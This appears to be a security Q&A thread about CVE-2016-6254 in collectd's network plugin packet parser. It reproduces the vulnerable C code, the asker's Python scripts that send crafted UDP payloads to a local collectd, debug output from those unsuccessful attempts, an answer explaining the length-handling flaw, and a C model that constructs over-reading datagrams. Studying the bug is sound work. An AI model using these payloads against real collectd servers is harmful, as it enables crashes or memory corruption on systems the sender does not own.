CVE-2016-6254 - Heap overflow description

1

Trying to understand this code snippet:

It contains a stack buffer overflow vulnerability:

static int parse_packet (sockent_t *se, /* {{{ */
        void *buffer, size_t buffer_size, int flags,
        const char *username)
{
    int status;

    value_list_t vl = VALUE_LIST_INIT;
    notification_t n;

#if HAVE_LIBGCRYPT
    int packet_was_signed = (flags & PP_SIGNED);
    int packet_was_encrypted = (flags & PP_ENCRYPTED);
    int printed_ignore_warning = 0;
#endif /* HAVE_LIBGCRYPT */

    memset (&vl, '\0', sizeof (vl));
    memset (&n, '\0', sizeof (n));
    status = 0;

    while ((status == 0) && (0 < buffer_size)
            && ((unsigned int) buffer_size > sizeof (part_header_t)))
    {
        uint16_t pkg_length;
        uint16_t pkg_type;

        memcpy ((void *) &pkg_type,
                (void *) buffer,
                sizeof (pkg_type));
        memcpy ((void *) &pkg_length,
                (void *) (buffer + sizeof (pkg_type)),
                sizeof (pkg_length));

        pkg_length = ntohs (pkg_length);
        pkg_type = ntohs (pkg_type);

        if (pkg_length > buffer_size)
            break;
        /* Ensure that this loop terminates eventually */
        if (pkg_length < (2 * sizeof (uint16_t)))
            break;

        if (pkg_type == TYPE_ENCR_AES256)
        {
            status = parse_part_encr_aes256 (se,
                    &buffer, &buffer_size, flags);
            if (status != 0)
            {
                ERROR ("network plugin: Decrypting AES256 "
                        "part failed "
                        "with status %i.", status);
                break;
            }
        }
#if HAVE_LIBGCRYPT
        else if ((se->data.server.security_level == SECURITY_LEVEL_ENCRYPT)
                && (packet_was_encrypted == 0))
        {
            if (printed_ignore_warning == 0)
            {
                INFO ("network plugin: Unencrypted packet or "
                        "part has been ignored.");
                printed_ignore_warning = 1;
            }
            buffer = ((char *) buffer) + pkg_length;
            continue;
        }
#endif /* HAVE_LIBGCRYPT */
        else if (pkg_type == TYPE_SIGN_SHA256)
        {
            status = parse_part_sign_sha256 (se,
                    &buffer, &buffer_size, flags);
            if (status != 0)
            {
                ERROR ("network plugin: Verifying HMAC-SHA-256 "
                        "signature failed "
                        "with status %i.", status);
                break;
            }
        }
#if HAVE_LIBGCRYPT
        else if ((se->data.server.security_level == SECURITY_LEVEL_SIGN)
                && (packet_was_encrypted == 0)
                && (packet_was_signed == 0))
        {
            if (printed_ignore_warning == 0)
            {
                INFO ("network plugin: Unsigned packet or "
                        "part has been ignored.");
                printed_ignore_warning = 1;
            }
            buffer = ((char *) buffer) + pkg_length;
            continue;
        }
#endif /* HAVE_LIBGCRYPT */
        else if (pkg_type == TYPE_VALUES)
        {
            status = parse_part_values (&buffer, &buffer_size,
                    &vl.values, &vl.values_len);
            if (status != 0)
                break;

            network_dispatch_values (&vl, username);

            sfree (vl.values);
        }
        else if (pkg_type == TYPE_TIME)
        {
            uint64_t tmp = 0;
            status = parse_part_number (&buffer, &buffer_size, &tmp);
            if (status == 0)
            {
                vl.time = TIME_T_TO_CDTIME_T (tmp);
                n.time = TIME_T_TO_CDTIME_T (tmp);
            }
        }
        else if (pkg_type == TYPE_TIME_HR)
        {
            uint64_t tmp = 0;
            status = parse_part_number (&buffer, &buffer_size, &tmp);
            if (status == 0)
            {
                vl.time = (cdtime_t) tmp;
                n.time = (cdtime_t) tmp;
            }
        }
        else if (pkg_type == TYPE_INTERVAL)
        {
            uint64_t tmp = 0;
            status = parse_part_number (&buffer, &buffer_size, &tmp);
            if (status == 0)
                vl.interval = TIME_T_TO_CDTIME_T (tmp);
        }
        else if (pkg_type == TYPE_INTERVAL_HR)
        {
            uint64_t tmp = 0;
            status = parse_part_number (&buffer, &buffer_size, &tmp);
            if (status == 0)
                vl.interval = (cdtime_t) tmp;
        }
        else if (pkg_type == TYPE_HOST)
        {
            status = parse_part_string (&buffer, &buffer_size,
                    vl.host, sizeof (vl.host));
            if (status == 0)
                sstrncpy (n.host, vl.host, sizeof (n.host));
        }
        else if (pkg_type == TYPE_PLUGIN)
        {
            status = parse_part_string (&buffer, &buffer_size,
                    vl.plugin, sizeof (vl.plugin));
            if (status == 0)
                sstrncpy (n.plugin, vl.plugin, sizeof (n.plugin));
        }
        else if (pkg_type == TYPE_PLUGIN_INSTANCE)
        {
            status = parse_part_string (&buffer, &buffer_size,
                    vl.plugin_instance, sizeof (vl.plugin_instance));
            if (status == 0)
                sstrncpy (n.plugin_instance, vl.plugin_instance,
                        sizeof (n.plugin_instance));
        }
        else if (pkg_type == TYPE_TYPE)
        {
            status = parse_part_string (&buffer, &buffer_size,
                    vl.type, sizeof (vl.type));
            if (status == 0)
                sstrncpy (n.type, vl.type, sizeof (n.type));
        }
        else if (pkg_type == TYPE_TYPE_INSTANCE)
        {
            status = parse_part_string (&buffer, &buffer_size,
                    vl.type_instance, sizeof (vl.type_instance));
            if (status == 0)
                sstrncpy (n.type_instance, vl.type_instance,
                        sizeof (n.type_instance));
        }
        else if (pkg_type == TYPE_MESSAGE)
        {
            status = parse_part_string (&buffer, &buffer_size,
                    n.message, sizeof (n.message));
            if (status != 0)
            {
                /* do nothing */
            }
            else if ((n.severity != NOTIF_FAILURE)
                    && (n.severity != NOTIF_WARNING)
                    && (n.severity != NOTIF_OKAY))
            {
                INFO ("network plugin: "
                        "Ignoring notification with "
                        "unknown severity %i.",
                        n.severity);
            }
            else if (n.time <= 0)
            {
                INFO ("network plugin: "
                        "Ignoring notification with "
                        "time == 0.");
            }
            else if (strlen (n.message) <= 0)
            {
                INFO ("network plugin: "
                        "Ignoring notification with "
                        "an empty message.");
            }
            else
            {
                plugin_dispatch_notification (&n);
            }
        }
        else if (pkg_type == TYPE_SEVERITY)
        {
            uint64_t tmp = 0;
            status = parse_part_number (&buffer, &buffer_size, &tmp);
            if (status == 0)
                n.severity = (int) tmp;
        }
        else
        {
            DEBUG ("network plugin: parse_packet: Unknown part"
                    " type: 0x%04hx", pkg_type);
            buffer = ((char *) buffer) + pkg_length;
        }
    } /* while (buffer_size > sizeof (part_header_t)) */

    if (status == 0 && buffer_size > 0)
        WARNING ("network plugin: parse_packet: Received truncated "
                "packet, try increasing 'MaxPacketSize'");

    return (status);
} /* }}} int parse_packet */

It was patched with this:

link

I spent some time investigating it but I can't find the bug...

Can anyone help?

Update 1:

Thanks for the answers, especially @grochmal

My attempt at a buffer overflow / stack overflow:

import socket

UDP_IP = "127.0.0.1"
UDP_PORT = 25826

print("UDP target IP:", UDP_IP)
print("UDP target port:", UDP_PORT)

sock = socket.socket(socket.AF_INET,     # Internet
                     socket.SOCK_DGRAM)  # UDP

# Raw collectd binary-protocol parts (2-byte type, 2-byte length, payload),
# as a bytes literal so the \x escapes go out as raw bytes under Python 3.
payload = b"\x00\x05\x00\x40\x6c\x61\x70\x74\x6f\x70\x00\x05\x01\x00\x0c\x00\x00\x00\x00\x58\x9c\xc5\x59\x00\x02\x00\x08\x61\x6e\x79\x00\x00\x03\x00\x40\x00\x00\x04\x00\x0a\x67\x61\x75\x67\x65\x00\x00\x07\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x05\x00\x15\x63\x00\x00\x05\x00\x40\x40\x6c\x61\x70\x74\x6f\x70\x00\x05\x01\x00\x0c\x00\x00\x00\x00\x58\x9c\xc5\x59\x00\x02\x00\x08\x61\x6e\x79\x00\x00\x03\x00\x05\x00\x00\x04\x00\x0a\x67\x61\x75\x67\x65\x00\x00\x07\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x05\x00\x15\x00\x00\x05\x00\x42\x40\x6c\x61\x70\x74\x6f\x70\x00\x05\x01\x00\x0c\x00\x00\x00\x00\x58\x9c\xc5\x59\x00\x02\x00\x08\x61\x6e\x79\x00\x00\x03\x00\x05\x00\x00\x04\x00\x0a\x67\x61\x75\x67\x65\x00\x00\x07\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x05\x00\x15\x00\x00\x00\x00\x05\x00\x42\x40\x6c\x61\x70\x74\x6f\x70\x00\x05\x01\x00\x0c\x00\x00\x00\x00\x58\x9c\xc5\x59\x00\x02\x00\x08\x61\x6e\x79\x00\x00\x03\x00\x05\x00\x00\x04\x00\x0a\x67\x61\x75\x67\x65\x00\x00\x07\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x05\x00\x15\x00\x00\x00\x00\x06\x00\x33\x00\x50\x01\x00\x00\x00\x00\x00\x00\x10\x40\x01\x00\x00\x00\x00\x00\x00\x10\x40\x01\x00\x00\x00\x00\x00\x00\x10\x40\x01\x00\x00\x00\x00\x00\x00\x10\x40\x01\x00\x00\x00\x00\x00\x00\x10\x40"

sock.sendto(payload, (UDP_IP, UDP_PORT))

But somehow I can't get past the buffer... if I set pkg_length in the last packet to 67, I get this:

parse_packet()
bufer_size:260
packet_was_encrypted:0
packet_was_signed:0
se->data.server.security_level:0
While() 0
buffer_size:260
Packet dump:400005004000050140000502400005034000050440000505400005064000050740000508400005094000050A4000050B4000050C4000050D4000050E4000050F400005104000051140000512400005134000051440000515400005164000051740000518400005194000051A4000051B4000051C4000051D4000051E4000051F400005204000052140000522400005234000052440000525400005264000052740000528400005294000052A4000052B4000052C4000052D4000052E4000052F400005304000053140000532400005334000053440000535400005364000053740000538400005394000053A4000053B4000053C4000053D4000053E4000053F400005404000054140000542400005434000054440000545400005464000054740000548400005494000054A4000054B4000054C4000054D4000054E4000054F400005504000055140000552400005534000055440000555400005564000055740000558400005594000055A4000055B4000055C4000055D4000055E4000055F400005604000056140000562400005634000056440000565400005664000056740000568400005694000056A4000056B4000056C4000056D4000056E4000056F400005704000057140000572400005734000057440000575400005764000057740000578400005794000057A4000057B4000057C4000057D4000057E4000057F400005804000058140000582400005834000058440000585400005864000058740000588400005894000058A4000058B4000058C4000058D4000058E4000058F400005904000059140000592400005934000059440000595400005964000059740000598400005994000059A4000059B4000059C4000059D4000059E4000059F400005A0400005A1400005A2400005A3400005A4400005A5400005A6400005A7400005A8400005A9400005AA400005AB400005AC400005AD400005AE400005AF400005B0400005B1400005B2400005B3400005B4400005B5400005B6400005B7400005B8400005B9400005BA400005BB400005BC400005BD400005BE400005BF400005C0400005C1400005C2400005C3400005C4400005C5400005C6400005C7400005C8400005C9400005CA400005CB400005CC400005CD400005CE400005CF400005D0400005D1400005D2400005D3400005D4400005D5400005D6400005D7400005D8400005D9400005DA400005DB400005DC400005DD400005DE400005DF400005E0400005E1400005E2400005E3400005E4400005E5400005E6400005E7400005E8400005E9400005EA400005EB400005EC400005ED400005EE400005EF400005F0400005F1400005F2400005F3400005F4400005F5400005F6400005F7400005F8400005F9400005FA400005FB400005FC400005FD400005FE400005FF40000600400006014000060240000603
pkg_length:16384
pkg_type:1280
pkg_length(ntohs):64
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:260
While() 1
buffer_size:196
Packet dump:400005004000050140000502400005034000050440000505400005064000050740000508400005094000050A4000050B4000050C4000050D4000050E4000050F400005104000051140000512400005134000051440000515400005164000051740000518400005194000051A4000051B4000051C4000051D4000051E4000051F400005204000052140000522400005234000052440000525400005264000052740000528400005294000052A4000052B4000052C4000052D4000052E4000052F400005304000053140000532400005334000053440000535400005364000053740000538400005394000053A4000053B4000053C4000053D4000053E4000053F400005404000054140000542400005434000054440000545400005464000054740000548400005494000054A4000054B4000054C4000054D4000054E4000054F400005504000055140000552400005534000055440000555400005564000055740000558400005594000055A4000055B4000055C4000055D4000055E4000055F400005604000056140000562400005634000056440000565400005664000056740000568400005694000056A4000056B4000056C4000056D4000056E4000056F400005704000057140000572400005734000057440000575400005764000057740000578400005794000057A4000057B4000057C4000057D4000057E4000057F400005804000058140000582400005834000058440000585400005864000058740000588400005894000058A4000058B4000058C4000058D4000058E4000058F400005904000059140000592400005934000059440000595400005964000059740000598400005994000059A4000059B4000059C4000059D4000059E4000059F400005A0400005A1400005A2400005A3400005A4400005A5400005A6400005A7400005A8400005A9400005AA400005AB400005AC400005AD400005AE400005AF400005B0400005B1400005B2400005B3400005B4400005B5400005B6400005B7400005B8400005B9400005BA400005BB400005BC400005BD400005BE400005BF400005C0400005C1400005C2400005C3
pkg_length:16384
pkg_type:1280
pkg_length(ntohs):64
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:196
While() 2
buffer_size:132
Packet dump:420005004200050142000502420005034200050442000505420005064200050742000508420005094200050A4200050B4200050C4200050D4200050E4200050F420005104200051142000512420005134200051442000515420005164200051742000518420005194200051A4200051B4200051C4200051D4200051E4200051F420005204200052142000522420005234200052442000525420005264200052742000528420005294200052A4200052B4200052C4200052D4200052E4200052F420005304200053142000532420005334200053442000535420005364200053742000538420005394200053A4200053B4200053C4200053D4200053E4200053F420005404200054142000542420005434200054442000545420005464200054742000548420005494200054A4200054B4200054C4200054D4200054E4200054F420005504200055142000552420005534200055442000555420005564200055742000558420005594200055A4200055B4200055C4200055D4200055E4200055F420005604200056142000562420005634200056442000565420005664200056742000568420005694200056A4200056B4200056C4200056D4200056E4200056F420005704200057142000572420005734200057442000575420005764200057742000578420005794200057A4200057B4200057C4200057D4200057E4200057F42000580420005814200058242000583
pkg_length:16896
pkg_type:1280
pkg_length(ntohs):66
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:132
While() 3
buffer_size:66
Packet dump:420005004200050142000502420005034200050442000505420005064200050742000508420005094200050A4200050B4200050C4200050D4200050E4200050F420005104200051142000512420005134200051442000515420005164200051742000518420005194200051A4200051B4200051C4200051D4200051E4200051F420005204200052142000522420005234200052442000525420005264200052742000528420005294200052A4200052B4200052C4200052D4200052E4200052F420005304200053142000532420005334200053442000535420005364200053742000538420005394200053A4200053B4200053C4200053D4200053E4200053F4200054042000541
pkg_length:16896
pkg_type:1280
pkg_length(ntohs):66
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:66

option = Hostname; value = 127.0.0.1;
option = FQDNLookup; value = true;
option = BaseDir; value = /opt/collectd/var/lib/collectd;
option = PIDFile; value = /opt/collectd/var/run/collectd.pid;
Done parsing '/opt/collectd/share/collectd/types.db'
Created new plugin context.
parse_packet()
bufer_size:260
packet_was_encrypted:0
packet_was_signed:0
se->data.server.security_level:0
While() 0
buffer_size:260
Packet dump:
pkg_length:16384
pkg_type:1280
pkg_length(ntohs):64
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:260
While() 1
buffer_size:196
Packet dump:400005004000050140000502400005034000050440000505400005064000050740000508400005094000050A4000050B4000050C4000050D4000050E4000050F400005104000051140000512400005134000051440000515400005164000051740000518400005194000051A4000051B4000051C4000051D4000051E4000051F400005204000052140000522400005234000052440000525400005264000052740000528400005294000052A4000052B4000052C4000052D4000052E4000052F400005304000053140000532400005334000053440000535400005364000053740000538400005394000053A4000053B4000053C4000053D4000053E4000053F400005404000054140000542400005434000054440000545400005464000054740000548400005494000054A4000054B4000054C4000054D4000054E4000054F400005504000055140000552400005534000055440000555400005564000055740000558400005594000055A4000055B4000055C4000055D4000055E4000055F400005604000056140000562400005634000056440000565400005664000056740000568400005694000056A4000056B4000056C4000056D4000056E4000056F400005704000057140000572400005734000057440000575400005764000057740000578400005794000057A4000057B4000057C4000057D4000057E4000057F400005804000058140000582400005834000058440000585400005864000058740000588400005894000058A4000058B4000058C4000058D4000058E4000058F400005904000059140000592400005934000059440000595400005964000059740000598400005994000059A4000059B4000059C4000059D4000059E4000059F400005A0400005A1400005A2400005A3400005A4400005A5400005A6400005A7400005A8400005A9400005AA400005AB400005AC400005AD400005AE400005AF400005B0400005B1400005B2400005B3400005B4400005B5400005B6400005B7400005B8400005B9400005BA400005BB400005BC400005BD400005BE400005BF400005C0400005C1400005C2400005C3
pkg_length:16384
pkg_type:1280
pkg_length(ntohs):64
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:196
While() 2
buffer_size:132
Packet dump:
pkg_length:16896
pkg_type:1280
pkg_length(ntohs):66
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:132
While() 3
buffer_size:66
Packet dump:
pkg_length:17152
pkg_type:1280
pkg_length(ntohs):67
pkg_type(ntohs):5
Break pkg_length > buffer_size

Update 2:

Hmmmm... no go... I was trying to overflow the values in parse_part_values() but there is a check for this:

Hmmmm... here it stops:

[2017-02-12 16:43:18] network plugin: parse_part_values: Packet too short: Chunk of size 726 expected, but buffer has only 51 bytes left.

Here is the code that produces the above:

exp.py

import socket

UDP_IP = "127.0.0.1"
UDP_PORT = 25826

print("UDP target IP:", UDP_IP)
print("UDP target port:", UDP_PORT)

sock = socket.socket(socket.AF_INET,     # Internet
                     socket.SOCK_DGRAM)  # UDP

# Raw collectd binary-protocol parts (2-byte type, 2-byte length, payload),
# as a bytes literal so the \x escapes go out as raw bytes under Python 3.
payload = b"\x00\x05\x00\x40\x6c\x61\x70\x74\x6f\x70\x00\x05\x01\x00\x0c\x00\x00\x00\x00\x58\x9c\xc5\x59\x00\x02\x00\x08\x61\x6e\x79\x00\x00\x03\x00\x40\x00\x00\x04\x00\x0a\x67\x61\x75\x67\x65\x00\x00\x07\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x05\x00\x15\x63\x00\x00\x05\x00\x40\x40\x6c\x61\x70\x74\x6f\x70\x00\x05\x01\x00\x0c\x00\x00\x00\x00\x58\x9c\xc5\x59\x00\x02\x00\x08\x61\x6e\x79\x00\x00\x03\x00\x05\x00\x00\x04\x00\x0a\x67\x61\x75\x67\x65\x00\x00\x07\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x05\x00\x15\x00\x00\x05\x00\x42\x40\x6c\x61\x70\x74\x6f\x70\x00\x05\x01\x00\x0c\x00\x00\x00\x00\x58\x9c\xc5\x59\x00\x02\x00\x08\x61\x6e\x79\x00\x00\x03\x00\x05\x00\x00\x04\x00\x0a\x67\x61\x75\x67\x65\x00\x00\x07\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x05\x00\x15\x00\x00\x00\x00\x05\x00\x42\x40\x6c\x61\x70\x74\x6f\x70\x00\x05\x01\x00\x0c\x00\x00\x00\x00\x58\x9c\xc5\x59\x00\x02\x00\x08\x61\x6e\x79\x00\x00\x03\x00\x05\x00\x00\x04\x00\x0a\x67\x61\x75\x67\x65\x00\x00\x07\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x05\x00\x15\x00\x00\x00\x00\x06\x00\x33\x00\x50\x01\x00\x00\x00\x00\x00\x00\x10\x40\x01\x00\x00\x00\x00\x00\x00\x10\x40\x01\x00\x00\x00\x00\x00\x00\x10\x40\x01\x00\x00\x00\x00\x00\x00\x10\x40\x01\x00\x00\x00\x00\x00\x00\x10\x40"

sock.sendto(payload, (UDP_IP, UDP_PORT))

Below is a frame dissected in Wireshark for the code above:

asked by android_dev 10.02.2017 - 14:55

1 answer

2

Since it is argued that this is a heap overflow, I assume the buffer is on the heap. And that is what the fix at the link suggests.

The problem is that pkg_length is taken from the buffer, which is a network packet and is therefore supplied by a connecting client:

memcpy ((void *) &pkg_length,
        (void *) (buffer + sizeof (pkg_type)),
        sizeof (pkg_length));

That uint16 can be set to whatever the person sending the packet wants. Now, quite frequently the following is done:

buffer = ((char *) buffer) + pkg_length;

Which is fine unless pkg_length > buffer_size, but at the beginning there is a check:

if (pkg_length > buffer_size)
    break;

The problem starts with the fact that there can be more than one packet in the buffer, since we have a while loop over it. Second, we have all those parse_* functions updating buffer_size, but they are not passed pkg_size. These functions can only know what they parsed and update buffer_size accordingly.

So, in the first packet we send a huge pkg_length (which is still smaller than buffer_size) and move the buffer forward. Then, in a second or third packet (or more) we can add a pkg_length that is larger than the rest of the buffer but still smaller than buffer_size. This will let us write past the end of the buffer.

answered by grochmal 12.02.2017 - 01:11
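An added example (not from the question, the answer, or collectd's own code) that models the part loop in C: offset stands in for the advanced buffer pointer and buffer_size for the counter the loop checks; a known part type consumes both, while the unknown-type branch advances only the pointer, which is what the collectd fix for CVE-2016-6254 closes by decrementing buffer_size there as well. The two constructed datagrams show why the poster's all-TYPE_TYPE_INSTANCE packet stops at the pkg_length > buffer_size check, and how a skipped unknown part lets a following part's length pass that check while reaching past the real end of the datagram. The part-type value 0x00ff and both datagrams are assumptions.

```c
#include <stdint.h>
#include <string.h>

/* 0x0005 is collectd's TYPE_TYPE_INSTANCE (seen in the debug output above);
 * 0x00ff is an assumed value that parse_packet() does not handle. */
#define TYPE_TYPE_INSTANCE 0x0005
#define TYPE_UNKNOWN_DEMO  0x00ff
#define PART_HEADER_LEN    4          /* uint16 type + uint16 length */

static uint16_t be16(const unsigned char *p)
{
    return (uint16_t)((p[0] << 8) | p[1]);
}

/* Append a part header declaring declared_len, then 'A' filler so the part
 * really occupies actual_len bytes. Returns the new packet length. */
static size_t put_part(unsigned char *pkt, size_t pos, uint16_t type,
                       uint16_t declared_len, size_t actual_len)
{
    pkt[pos]     = (unsigned char)(type >> 8);
    pkt[pos + 1] = (unsigned char)(type & 0xff);
    pkt[pos + 2] = (unsigned char)(declared_len >> 8);
    pkt[pos + 3] = (unsigned char)(declared_len & 0xff);
    memset(pkt + pos + PART_HEADER_LEN, 'A', actual_len - PART_HEADER_LEN);
    return pos + actual_len;
}

/* Model of parse_packet()'s loop. Returns how many bytes past the real end of
 * pkt a part would be read from; 0 means the loop stopped safely. */
static size_t walk_parts(const unsigned char *pkt, size_t pkt_len, int fixed)
{
    size_t offset = 0, buffer_size = pkt_len;

    while (buffer_size > PART_HEADER_LEN) {
        /* bytes really left; in the vulnerable loop this can be less than
         * buffer_size once an unknown part has been skipped */
        size_t real_left = (offset <= pkt_len) ? pkt_len - offset : 0;
        if (real_left < PART_HEADER_LEN)
            return PART_HEADER_LEN - real_left;   /* header read is out of bounds */

        uint16_t pkg_type   = be16(pkt + offset);
        uint16_t pkg_length = be16(pkt + offset + 2);

        if (pkg_length > buffer_size)        /* the loop's only size check */
            break;
        if (pkg_length < PART_HEADER_LEN)    /* forward-progress guard */
            break;

        if (pkg_type == TYPE_TYPE_INSTANCE) {
            /* parse_part_string() checks the length against buffer_size and
             * then reads pkg_length bytes from the cursor */
            if (pkg_length > real_left)
                return pkg_length - real_left;
            offset += pkg_length;
            buffer_size -= pkg_length;       /* the helper updates both */
        } else {
            offset += pkg_length;            /* unknown part: pointer only... */
            if (fixed)
                buffer_size -= pkg_length;   /* ...unless the fix is applied */
        }
    }
    return 0;
}

/* Constructed datagram shaped like the poster's: four TYPE_TYPE_INSTANCE parts
 * declaring 64, 64, 66 and 67 bytes in 260 bytes; the last claims one byte
 * more than is left, so the check stops the loop with or without the fix. */
static size_t known_parts_overrun(int fixed)
{
    unsigned char pkt[260];
    size_t n = put_part(pkt, 0, TYPE_TYPE_INSTANCE, 64, 64);
    n = put_part(pkt, n, TYPE_TYPE_INSTANCE, 64, 64);
    n = put_part(pkt, n, TYPE_TYPE_INSTANCE, 66, 66);
    n = put_part(pkt, n, TYPE_TYPE_INSTANCE, 67, 66);
    return walk_parts(pkt, n, fixed);
}

/* Constructed 64-byte datagram: an unknown part declaring 40 bytes, then a
 * TYPE_TYPE_INSTANCE part declaring 60 although only 24 bytes remain. */
static size_t unknown_part_overrun(int fixed)
{
    unsigned char pkt[64];
    size_t n = put_part(pkt, 0, TYPE_UNKNOWN_DEMO, 40, 40);
    n = put_part(pkt, n, TYPE_TYPE_INSTANCE, 60, 24);
    return walk_parts(pkt, n, fixed);
}
```

Without the fix the second datagram would have 36 bytes read from beyond the datagram's end; with it, the stale buffer_size is gone and the same check that stopped the poster's packet stops this one too.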
